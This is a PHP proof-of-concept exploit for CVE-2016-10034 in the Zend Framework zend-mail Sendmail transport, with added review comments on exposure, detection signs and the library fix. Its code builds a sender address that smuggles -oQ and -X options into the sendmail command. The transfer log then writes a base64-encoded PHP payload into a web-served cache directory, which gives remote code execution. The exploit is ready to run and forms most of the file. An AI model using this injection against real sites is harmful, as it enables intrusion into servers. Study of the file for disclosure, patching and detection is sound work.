
<?php

/*

Zend Framework < 2.4.11 Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11
zend-mail < 2.7.2

Discovered/Coded by:

Dawid Golunski
https://legalhackers.com

Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html

Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html


Follow the feed for updates:

https://twitter.com/dawid_golunski


A simple PoC (working on Sendmail MTA)

It will inject the following parameters to sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]



which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:

09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<


See the full advisory URL for the exploit details.

*/


// NOTE(review): this is the published proof-of-concept for CVE-2016-10034, kept
// here as written. What it demonstrates: the vulnerable zend-mail Sendmail
// transport hands the sender address to sendmail (the "-r" argument in the list
// above) by way of mail()'s additional-parameters argument, without escaping it,
// so option-looking tokens embedded in the address become separate sendmail
// arguments (args 4-7 in the header list). The fix is the library upgrade to the
// zend-mail versions named in the header.
//
// Defensive reading of this file:
//   - exposure: any user-supplied value that ends up as the From / return-path
//     address of a message sent through the Sendmail transport is the injection
//     point; the technique additionally needs one web-server-writable directory
//     under the document root for the "-X" log write shown above;
//   - observables: sendmail being invoked with -X/-oQ options, and new .php
//     files appearing in cache/upload directories, are the artefacts a detection
//     rule for this class of bug can key on.

// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field

// Crafted sender value: the quoted local part ("...") keeps the string a
// syntactically valid e-mail address, while the spaces inside the quotes are
// what split it into the separate argv entries listed in the header.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';

// encoded phpinfo() php code
// The body text is what lands in the sendmail transfer log ("-X"); the
// header's sample log output shows the decoded payload line verbatim.
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");



// ------------------

// mail() param injection via the vulnerability in zend-mail


// Bootstraps the vulnerable application from its root: the PoC is expected to
// sit one level below the application root (dirname(__DIR__)) so that the
// relative vendor/ and config/ paths below resolve.
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
    'Zend\Loader\StandardAutoloader' => array(
        'autoregister_zf' => true
    )
));

// Runs the MVC application before the message is built -- presumably so the
// application's own configuration/services are loaded; confirm against the
// target layout, as nothing below depends on the dispatch result.
Zend\Mvc\Application::init(require 'config/application.php')->run();

// Ordinary zend-mail message construction; the only unusual input is the From
// value, which is exactly how this bug surfaces in a real contact form.
$message = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

// The Sendmail transport is the affected code path (it builds the sendmail
// argument string). An SMTP transport does not pass through sendmail argv and so
// is not exposed to this particular bug, but the remediation remains upgrading
// zend-mail and validating sender addresses at the application boundary.
$transport = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);

?>